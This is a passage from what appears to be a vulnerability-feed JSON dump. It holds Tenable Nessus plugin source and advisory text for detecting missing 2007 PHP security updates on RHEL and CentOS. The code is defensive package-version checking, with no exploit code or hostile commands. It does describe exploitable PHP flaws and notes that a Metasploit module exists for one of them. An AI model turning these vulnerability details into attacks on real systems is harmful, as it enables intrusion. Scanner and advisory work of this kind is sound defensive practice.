script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0155\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"php-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-devel-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-imap-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-ldap-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-mysql-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-odbc-4.3.2-40.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-pgsql-4.3.2-40.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 
reference:\"php-mbstring-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.22.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-xmlrpc-4.3.9-3.22.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:16", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. 
(CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. 
A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-10T00:00:00", "published": "2007-04-19T00:00:00", "id": "CENTOS_RHSA-2007-0155.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25043", "title": "CentOS 3 / 4 : php (CESA-2007:0155)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0155 and \n# CentOS Errata and Security Advisory 2007:0155 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25043);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1583\", \"CVE-2007-1711\", \"CVE-2007-1718\");\n script_bugtraq_id(22764, 22765, 23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0155\");\n\n script_name(english:\"CentOS 3 / 4 : php (CESA-2007:0155)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. 
A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. 
A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013669.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5aa1da2d\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013672.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?00b4b6bf\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013677.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b57e934e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013678.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84a6c30c\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013682.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05af58a3\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013683.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a2d68f08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-devel-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-imap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-ldap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-mysql-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-odbc-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-pgsql-4.3.2-40.ent\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"php-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-devel-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-domxml-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-gd-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-imap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ldap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mbstring-4.3.9-3.22.4\")) flag++;\nif 
(rpm_check(release:\"CentOS-4\", reference:\"php-mysql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ncurses-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-odbc-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pear-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pgsql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-snmp-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-xmlrpc-4.3.9-3.22.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:17", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. 
A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-10T00:00:00", "published": "2007-04-30T00:00:00", "id": "CENTOS_RHSA-2007-0153.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25095", "title": "CentOS 5 : php (CESA-2007:0153)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0153 and \n# CentOS Errata and Security Advisory 2007:0153 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25095);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_bugtraq_id(23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0153\");\n\n script_name(english:\"CentOS 5 : php (CESA-2007:0153)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web 
server.\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013694.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20c5e27f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-April/013695.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1cf75bb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-bcmath-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-cli-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-common-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-dba-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-devel-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-gd-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-imap-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-ldap-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-mbstring-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-mysql-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-ncurses-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-odbc-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-pdo-5.1.6-11.el5\")) flag++;\nif 
(rpm_check(release:\"CentOS-5\", reference:\"php-pgsql-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-snmp-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-soap-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-xml-5.1.6-11.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php-xmlrpc-5.1.6-11.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:20", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. 
If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-16T00:00:00", "published": "2007-05-25T00:00:00", "id": "REDHAT-RHSA-2007-0153.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25325", "title": "RHEL 5 : php (RHSA-2007:0153)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0153. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25325);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_bugtraq_id(23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0153\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0153)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way the mbstring extension set global\nvariables. 
A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0455\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1001\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1718\"\n );\n 